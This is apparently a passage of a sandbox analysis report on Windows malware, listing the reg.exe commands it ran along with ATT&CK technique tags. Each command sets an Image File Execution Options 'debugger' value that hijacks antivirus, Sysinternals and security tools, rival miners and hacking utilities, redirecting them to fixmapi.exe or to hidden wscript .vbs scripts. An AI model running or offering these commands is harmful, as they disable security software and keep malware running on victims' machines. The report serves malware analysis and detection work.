    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\help.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2024
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Microsoft.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhostw.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4868
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CcmEventCollector.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smsdefrag.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1372
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CcmService.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3260
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sitehelp.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4400
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cefutil.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4852
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\romserver.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:412
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\minerd.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4908
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ApVxdWin.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3344
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSafeMain.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4348
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSROL.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4256
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVENGINE.EXE" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3540
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WebProxy.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4488
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrafInspRep.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2696
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrafInsp.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4220
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ipz.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ipz2.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cssrs.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\fixmapi.exe" /f
    3⤵
    PID:3092
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Wasppacer.exe" /v "debugger" /t REG_SZ /d "ipz2.exe" /f
    3⤵
    PID:4796
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Wasppacer.exe" /v "debugger" /t REG_SZ /d "ipz.exe" /f
    3⤵
    PID:2740
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fwnrww.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\secscan.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1052
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wasub.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3644
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Windows10UpgraderApp.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:860
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nssm.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3488
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmvp.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5096
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wuaudt.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2228
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\expmon.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:4240
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msdts.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2612
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winmhjqkn.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2108
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jingling.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3064
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ForServiceApp.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1936
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brutb.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4532
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cgminer.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3440
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fmefsh.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1928
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinPatrol.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:3764
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\x64.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1976
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fmefss.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3100
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fmsh.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fmss.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1716
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ServiceApp.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2296
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\apgr.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2628
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\surfblock.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:3136
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\auditd.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ciprotect.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2964
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zam.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4840
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IProtectorService.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1112
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dcsrv.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:3460
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftPage.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4164
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winmm.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3236
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcefrend.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\endpointservice.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2656
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\epag.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4780
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\endpointintegration.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2572
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\updateservice.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:4036
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spm.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3228
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msrtn32.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2420
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cdhtr.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4460
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MRT.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:904
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rthdcpd.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2256
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nsl.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4464
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cpx.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3420
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dll32.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:1656
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sound.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3960
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SystemExplorer.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:4448
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp64.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:3156
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:4568
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDWelcome.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:984
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SVRTgui.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:4812
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDTools.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:3992
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDSysRepair.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:2528
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDShell.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDRootAlyzer.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDScan.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:3688
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SpybotSD.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:1828
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Panda_URL_Filtering.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:2428
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cureit.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:3716
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Tcpview.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:3452
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpvcon.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:5040
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DUBrute.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:1420
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avz.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:2244
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PccNT.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:3528
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BWMeter.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:3792
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPortScan3.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:4044
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ForcerX+__.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Cain.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:3328
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RDPSS.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:716
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safesurf.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:2096
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xscan_gui.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:4828
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pex.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:4984
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MailCracker.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\stinger.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:392
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rootkitremover.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2356
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MvtApp.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:2212
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\restarter_x64.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:4592
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ASMAIN.EXE" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:648
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoDENGI.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:4852
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DUB8.2.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:412
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IObitUninstaler.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:4908
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xp64.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:3344
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EmailSpider.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:4348
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Suo12_StartupManager.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:4256
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cureit.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:940
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:5112
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon64.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:3776
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareDesktop.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:612
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DUBrute.2.2.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:3796
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EnterpriseConsole.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1644
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lamescan3.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
